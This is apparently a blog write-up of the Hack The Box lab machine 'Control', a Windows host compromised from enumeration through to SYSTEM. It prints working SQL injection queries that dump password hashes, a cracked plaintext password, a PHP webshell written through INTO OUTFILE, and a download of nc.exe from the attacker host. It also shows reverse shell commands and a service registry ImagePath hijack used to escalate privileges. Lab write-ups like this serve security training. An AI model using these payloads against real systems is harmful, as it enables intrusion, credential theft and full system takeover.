Control - Hack The Box
Synopsis
Control is hard difficulty Windows machine featuring a Corporate Interal website which we can access through proxy
and it is vulnerable to SQL Injection
. This leverage to extral MySQL usersname and password hashes
, and also write webshell
using SQLi to gain the Initial foothold. By cracking
the password hash of hector user helps us to move laterally to his windodws account. Examining the Powershell history
file reveals that Registry Permissions
may have been modified. After Enumerating Registry Service permissions and other service properties, seclogon
service is abused to escalate shell as NT AUTHORITY\SYSTEM
.
Skills Required
- Basic Knowledge of windows
Skills Learned
- Basic SQL Injection
- Hash cracking
- Service Enumeration
- Windows Defender Evasion
Enumeration
Nmap
# Nmap 7.80 scan initiated Mon Apr 20 19:06:28 2020 as: nmap -Pn -sC -sV -v -p80,135,3306,49666,49667 -oN full.nmap control.htb
Nmap scan report for control.htb (10.10.10.167)
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '10.10.15.115' is not allowed to connect to this MariaDB server
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=4/20%Time=5E9DA55D%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.115'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Looking at Nmap results. we see MySQL
and IIS
running on their default ports. IIS
Version is 10.0
which indicates this is either Windows server 2016
or Windows server 2019
.
HTTP Proxy
Navigating to the port 80
. we’re presented with a website name Fidelity
.
Browsing through the website we’ve /about.php
and /admin.php
endpoints. Based on the extensions we can confirm that we’re dealing with a php
application. /about.php
has some sample text and nothing interesting on it. Navigating to /admin.php
gives us Access Denied: Header Missing
.
Looking at the page source on /index.php
give us some Info in comments.
It contains a to-do list which has an IP
address init.
Now, we’ll look at the HTTP Header
missing for proxy
on /admin.php
. Searching for HTTP Proxy Header
. I came across the mozilla
website. which details abouthe HTTP proxy header
.
/admin.php
says its request need to go through proxy
. So, we’ll add this Headers along with the IP
address we found and make request to the website. We’ll automate this process using wfuzz
.
$ cat headers.txt
Forwarded
X-Forwarded-For
X-Forwarded-Host
X-Forwarded-Proto
Via
$ wfuzz -u http://10.10.10.167/admin.php -H FUZZ:192.168.4.28 -w headers.txt --hl 0
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.167/admin.php
Total requests: 5
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000002: 200 153 L 466 W 7933 Ch "X-Forwarded-For"
X-Forwarded-For: 192.168.4.28
gave us HTTP 200
. Adding this header manually and navigating to /admin.php
provides us with a Product catalog
page. Where we’ve list of products we can modify and search them.
To automatically add X-Forarded-For
header to our request. We’ll use Burp Match and replace
rule to add a cutsom header to our requests.
SQL Injection
Let’s look at the product search
functionality present at /search_products.php
in Burp.
We’ll start testing for SQLi
. Adding a '
to the prouductName like this productName=Asus'
gave us MySQL
error. So, we can confirm the SQLi
on the productName
parameter.
We can make our query good by adding a comment to it productName=Asus'--+-
. This doesn’t gives us any errors. since we don’t have any error’s in our query.
Next, we’ll try to figure out number of columns this table has using ORDER BY
statement. which helps us to do Union Injection
. We’ll start with 1
which orders the table based on first column productName=Asus' ORDER BY 1 --+-
. We’ll keep on incrementing the number untill we get an error in our response.
When we try to do ORDER BY 7
we get a mysql
errror in the response saying Error: SQLSTATE[42S22]: Column not found: 1054 Unknown column '7' in 'order clause'
. This mean the table we’re trying SQLi
on has 6
columns in it. This helps us to do union Injection
now.
We’ll Union Inject
using numbers
like this productName=Asus' UNION SELECT 1,2,3,4,5,6-- -
and see which columns are visible to us and return output. So, we can insert our querys Inside them.
All teh columns are Injectable and we can start pulling the data
from the DB
. We can check the User the DB
is running as,version
of DB and the current Database using following query.
productName=Asus' UNION SELECT 1,user(),database(),@@version,5,6-- -
To list all the Databases we can user Information_schema.schemata
.
productName=Asus' UNION SELECT 1,SCHEMA_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.SCHEMATA-- -
This query gives us three DB
names: Information_schema
, mysql
, warehouse
. Since we’re intereseted in user credential
we can grab the username and password from mysql.user
table. Using following query.
productName=test' union select 1,(SELECT group_concat(User,":",password SEPARATOR '\n') from mysql.user),3,4,5,6-- -
We got the username
and password
hashes from the table.
root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
Crack MySQL Passwords
Hashcat
helps us to crack hector
password hash. Now, we’ve the credentials for hector user hector : l33th4x0rhector
.
$ cat hector.hash
0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
$ hashcat -m 300 hector.hash /usr/share/wordlists/rockyou.txt --force
<SNIP>
0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector
<SNIP>
FootHold
Using Into Outfile
we can upload a php
webshell to web root with the help of SQLi.
productName=Asus'+union+select+1,'<?php system($_REQUEST["cmd"]);?>',3,4,5,6 into outfile 'C:\\inetpub\\wwwroot\\mah1ndra.php'--+-
After requesting the URL, We can use cmd
paramter to execute commands on the server.
$ curl -X POST http://10.10.10.167/mah1ndra.php --data-urlencode cmd=whoami
1 nt authority\iusr
3 4 5 6
To gain a interactive reverse shell
we’ll upload nc.exe
on to the server and make a reverse shell to our machine with help of it.
http://10.10.10.167/mah1ndra.php?cmd=powershell -c "iwr -uri http://10.10.15.251/nc.exe -outfile C:\temp\nc.exe"
http://10.10.10.167/mah1ndra.php?cmd=C:\temp\nc.exe 10.10.15.251 443 -e powershell
And we got a reverse shell as nt authority\iusr
$ sudo rlwrap ncat -lvnp 443
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.167.
Ncat: Connection from 10.10.10.167:49680.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\wwwroot> whoami
nt authority\iusr
PS C:\inetpub\wwwroot> hostname
Fidelity
Lateral Movement
Looking at the users present on the box. we can hector
in there.
PS C:\inetpub\wwwroot> net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Hector WDAGUtilityAccount
The command completed with one or more errors.
Let’s get bit more details about hecotr
.
PS C:\inetpub\wwwroot> net user hector
net user hector
User name Hector
Full Name Hector
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/1/2019 12:27:50 PM
Password expires Never
Password changeable 11/1/2019 12:27:50 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/27/2020 7:41:00 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Since, Hecotor
is a part of Remote Management Users
we’ll can login as hectors with the credentials
we got previously.
We’ll create a Credential variable
here. We do this because Windows doesn’t like passing passwords as plain text to a command.
PS C:\inetpub\wwwroot> $pass = convertTo-SecureString -AsPlainText -Force -String "l33th4x0rhector"
PS C:\inetpub\wwwroot> $credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "nt authority\hector",$pass
Now, we’ll use Invoke-Command
to run commands as hecotor, and it works.
PS C:\inetpub\wwwroot> Invoke-Command -ComputerName Fidelity -Credential $credential -ScriptBlock {whoami}
control\hector
Now, with using the same nc.exe
at C:\temp\
. We can obtain a reverse shell as hector
using Invoke-Command
.
PS C:\inetpub\wwwroot> Invoke-Command -ComputerName Fidelity -Credential $credential -ScriptBlock {C:\temp\nc.exe 10.10.15.251 443 -e powershell}
And We got a shell as Hector
user.
$ sudo rlwrap ncat -lvnp 443
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.167.
Ncat: Connection from 10.10.10.167:49688.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Hector\Documents> whoami
control\hector
PS C:\Users\Hector\Documents> hostname
Fidelity
Privilege Escalation
Let’s check Powershell history
file, to see if we can find anything interesting there.
PS C:\Users\Hector\Documents> gc (Get-PSReadlineOption).HistorySavePath
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
It seems like hector
has been looking at Registry ACL's
and items under CurrentControlSet
. Maybe they’ve changed the permissions somewhere. Service Properties exist as subkeys and values under the HKLM:\SYSTEM\CurrentControlSet\Services
. If we’ve permissions tho this we can potentially change the binary path
for all the services. Let’s check the permissions.
PS C:\Users\Hector\Documents> $acl = get-acl HKLM:\System\CurrentControlSet\Services
PS C:\Users\Hector\Documents> $acl
Path Owner Access
---- ----- ------
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services NT AUTHORITY\SYSTEM CREATOR...
PS C:\Users\Hector\Documents> ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights| Foreach-Object {$_.DiscretionaryAcl}
NT AUTHORITY\Authenticated Users: AccessAllowed (EnumerateSubKeys, ExecuteKey, Notify, QueryValues, ReadPermissions)
NT AUTHORITY\SYSTEM: AccessAllowed (ChangePermissions, CreateLink, CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite, Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey)
BUILTIN\Administrators: AccessAllowed (ChangePermissions, CreateLink, CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite, Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey)
CONTROL\Hector: AccessAllowed (ChangePermissions, CreateLink, CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite, Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES: AccessAllowed (EnumerateSubKeys, ExecuteKey, Notify, QueryValues, ReadPermissions)
Although we can change the binary path values this isn’t userful unless we’re able to start
a paticular services running as privileged user.
Now, we’re intersed in services running as NT Authority\SYSTEM
, which are configured with a manual start type, that we also have permission to start.
We’ll start checking for services that has ObjectName: LocalSystem
and Start: 3
set whcih mean manual Startup
. start: 2 (Autoload)
, start: 4 (Disabled)
.
PS C:\Users\Hector\Documents> $services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
PS C:\Users\Hector\Documents> $services | where {($_.ObjectName -match 'LocalSystem') -and ($_.Start -match '3')}
<SNIP>
Description : @%Systemroot%\system32\wbem\wmiapsrv.exe,-111
DisplayName : @%Systemroot%\system32\wbem\wmiapsrv.exe,-110
ErrorControl : 1
FailureActions : {132, 3, 0, 0...}
ImagePath : C:\Windows\system32\wbem\WmiApSrv.exe
ObjectName : localSystem
ServiceSidType : 1
Start : 3
Type : 16
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\wmiApSrv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
PSChildName : wmiApSrv
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
<SNIP>
Last thing we’ve to check for the services Names that we’ve permission to start
. So, That we can change our their binPath
to our reverse shell
payload and start the service to get a shell.
PS C:\Users\Hector\Documents> $tmp = $services | where {($_.ObjectName -match 'LocalSystem')}
PS C:\Users\Hector\Documents> $serviceNames = $tmp.pschildname
PS C:\Users\Hector\Documents> $canStart = foreach ($service in $serviceNames) { $sddl = (cmd /c sc sdshow $service); if ($sddl -match "RP[A-Z]*?;;;AU") { $service}}
PS C:\Users\Hector\Documents>$canStart
AppVClient
ConsentUxUserSvc
DevicePickerUserSvc
DevicesFlowUserSvc
PimIndexMaintenanceSvc
PrintWorkflowUserSvc
RasMan
seclogon
UevAgentService
UnistoreSvc
UserDataSvc
WaaSMedicSvc
WpnUserService
wuauserv
We’ll configure the binary path to seclogon
serive to execute a netcat shell.
PS C:\Users\Hector\Documents> set-itemproperty -erroraction silentlycontinue -path HKLM:\system\currentcontrolset\services\seclogon -name imagepath -value "C:\temp\nc.exe 10.10.15.251 443 -e powershell";
PS C:\Users\Hector\Documents> start-service seclogon -erroraction silentlycontinue;
Starting service. we’ve recieved a reverse shell as nt authority\system
.
$ sudo rlwrap ncat -lvnp 443
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.167.
Ncat: Connection from 10.10.10.167:49701.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
Fidelity
Thank you for taking your time for reading this blog!.